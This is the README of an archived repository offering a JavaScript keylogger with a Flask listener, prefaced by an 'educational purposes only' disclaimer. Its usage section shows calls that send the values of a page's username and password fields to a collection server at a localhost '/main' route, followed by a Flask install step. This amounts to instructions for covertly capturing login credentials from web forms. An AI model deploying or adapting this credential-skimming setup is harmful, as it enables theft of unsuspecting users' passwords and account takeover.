Skip to content
This repository has been archived by the owner on Jul 5, 2024. It is now read-only.

Latest commit

 

History

History
25 lines (19 loc) · 787 Bytes

README.md

File metadata and controls

25 lines (19 loc) · 787 Bytes

Disclaimer

This script is for educational purposes only. Do not use it for illegal activities. You are solely responsible for your own actions!

keylog

keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that a person using the keyboard is unaware that their actions are being monitored.

Usage

keylogger.js

// Call the send function
send(element_id, server_url, parameter_name);

// For listener.py
// According to listener.py the route should be '/main'
// Parameters for username and password should be username and password
send('user','http://localhost:5959/main','username');
send('pass','http://localhost:5959/main','password');

Install flask

pip3 install flask